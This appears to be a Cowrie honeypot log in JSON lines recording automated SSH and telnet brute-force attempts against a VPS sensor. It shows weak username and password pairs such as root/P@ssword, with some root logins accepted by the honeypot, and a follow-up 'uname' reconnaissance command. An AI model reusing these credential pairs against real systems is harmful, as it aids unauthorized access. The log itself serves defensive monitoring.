{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T03:05:01.942392Z","src_ip":"212.227.125.160","session":"f4c6745da098"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:09.724104Z","src_ip":"212.227.125.160","session":"f4c6745da098"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":36653,"dst_ip":"1.2.3.4","dst_port":22,"session":"5618c19c42ef","protocol":"ssh","message":"New connection: 45.125.211.194:36653 (1.2.3.4:22) [session: 5618c19c42ef]","sensor":"my-vps","timestamp":"2025-08-28T03:05:11.235607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:05:11.282054Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:05:11.459001Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:05:12.284004Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:05:12.720192Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:05:12.720975Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:12.932037Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:12.933200Z","src_ip":"45.125.211.194","session":"5618c19c42ef"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":17041,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0ce50ffde43","protocol":"ssh","message":"New connection: 80.94.95.15:17041 (1.2.3.4:22) [session: d0ce50ffde43]","sensor":"my-vps","timestamp":"2025-08-28T03:05:24.252758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:05:24.253469Z","src_ip":"80.94.95.15","session":"d0ce50ffde43"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:05:24.306053Z","src_ip":"80.94.95.15","session":"d0ce50ffde43"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T03:05:24.600271Z","src_ip":"80.94.95.15","session":"d0ce50ffde43"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:25.654195Z","src_ip":"80.94.95.15","session":"d0ce50ffde43"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":33551,"dst_ip":"1.2.3.4","dst_port":22,"session":"53cad29aa004","protocol":"ssh","message":"New connection: 45.125.211.194:33551 (1.2.3.4:22) [session: 53cad29aa004]","sensor":"my-vps","timestamp":"2025-08-28T03:05:26.046204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:05:26.050487Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:05:26.262939Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:05:27.096036Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:05:27.620578Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:05:27.621247Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:27.857626Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:27.858762Z","src_ip":"45.125.211.194","session":"53cad29aa004"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":60064,"dst_ip":"1.2.3.4","dst_port":22,"session":"c687b259aa91","protocol":"ssh","message":"New connection: 194.233.79.134:60064 (1.2.3.4:22) [session: c687b259aa91]","sensor":"my-vps","timestamp":"2025-08-28T03:05:31.119234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:05:31.323442Z","src_ip":"194.233.79.134","session":"c687b259aa91"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:05:31.943297Z","src_ip":"194.233.79.134","session":"c687b259aa91"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:05:34.006028Z","src_ip":"194.233.79.134","session":"c687b259aa91"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:36.835360Z","src_ip":"194.233.79.134","session":"c687b259aa91"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":53618,"dst_ip":"1.2.3.4","dst_port":22,"session":"03ada01134c3","protocol":"ssh","message":"New connection: 45.125.211.194:53618 (1.2.3.4:22) [session: 03ada01134c3]","sensor":"my-vps","timestamp":"2025-08-28T03:05:40.825752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:05:40.839846Z","src_ip":"45.125.211.194","session":"03ada01134c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:05:41.035616Z","src_ip":"45.125.211.194","session":"03ada01134c3"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:05:41.871857Z","src_ip":"45.125.211.194","session":"03ada01134c3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:43.083163Z","src_ip":"45.125.211.194","session":"03ada01134c3"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32032,"dst_ip":"1.2.3.4","dst_port":22,"session":"f507f8e1bf50","protocol":"ssh","message":"New connection: 45.125.211.194:32032 (1.2.3.4:22) [session: f507f8e1bf50]","sensor":"my-vps","timestamp":"2025-08-28T03:05:55.757343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:05:55.778492Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:05:55.970446Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:05:56.799429Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:05:57.325470Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:05:57.326299Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:57.554708Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:05:57.555825Z","src_ip":"45.125.211.194","session":"f507f8e1bf50"}
{"eventid":"cowrie.session.connect","src_ip":"5.185.87.36","src_port":40618,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec9707dbe155","protocol":"telnet","message":"New connection: 5.185.87.36:40618 (1.2.3.4:23) [session: ec9707dbe155]","sensor":"my-vps","timestamp":"2025-08-28T03:06:02.937168Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19921,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3ecee083cc3","protocol":"ssh","message":"New connection: 45.125.211.194:19921 (1.2.3.4:22) [session: c3ecee083cc3]","sensor":"my-vps","timestamp":"2025-08-28T03:06:10.614929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:06:10.624829Z","src_ip":"45.125.211.194","session":"c3ecee083cc3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:06:10.837943Z","src_ip":"45.125.211.194","session":"c3ecee083cc3"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:11.716081Z","src_ip":"45.125.211.194","session":"c3ecee083cc3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:06:12.937869Z","src_ip":"45.125.211.194","session":"c3ecee083cc3"}
{"eventid":"cowrie.session.closed","duration":12.617480754852295,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:06:15.554579Z","src_ip":"5.185.87.36","session":"ec9707dbe155"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51943,"dst_ip":"1.2.3.4","dst_port":22,"session":"9380346ff722","protocol":"ssh","message":"New connection: 45.125.211.194:51943 (1.2.3.4:22) [session: 9380346ff722]","sensor":"my-vps","timestamp":"2025-08-28T03:06:25.323455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:06:25.349133Z","src_ip":"45.125.211.194","session":"9380346ff722"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:06:25.534404Z","src_ip":"45.125.211.194","session":"9380346ff722"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:26.363068Z","src_ip":"45.125.211.194","session":"9380346ff722"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:06:27.573017Z","src_ip":"45.125.211.194","session":"9380346ff722"}
